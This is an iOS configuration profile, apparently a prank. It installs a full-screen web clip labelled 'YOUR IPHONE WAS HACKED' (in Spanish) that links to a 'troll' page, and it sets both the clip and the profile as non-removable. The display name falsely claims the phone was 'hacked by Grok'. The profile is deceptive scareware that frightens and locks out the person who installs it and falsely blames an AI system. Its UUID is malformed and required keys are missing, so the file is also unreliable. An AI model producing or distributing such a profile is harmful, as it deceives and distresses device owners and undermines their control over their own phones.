<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>PayloadContent</key>
    <array>
        <dict>
            <key>PayloadType</key>
            <string>com.apple.webClip.managed</string>
            <key>URL</key>
            <string>https://tunombre.github.io/troll.html</string>
            <key>Label</key>
            <string>🔥 TU IPHONE FUE HACKEADO 🔥</string>
            <key>FullScreen</key>
            <true/>
            <key>IsRemovable</key>
            <false/>
        </dict>
    </array>
    <key>PayloadDisplayName</key>
    <string>¡IPHONE HACKEADO POR GROK!</string>
    <key>PayloadRemovalDisallowed</key>
    <true/>
    <key>PayloadUUID</key>
    <string>6666-6666-6666-6666</string>
    <key>PayloadType</key>
    <string>Configuration</string>
</dict>
</plist>
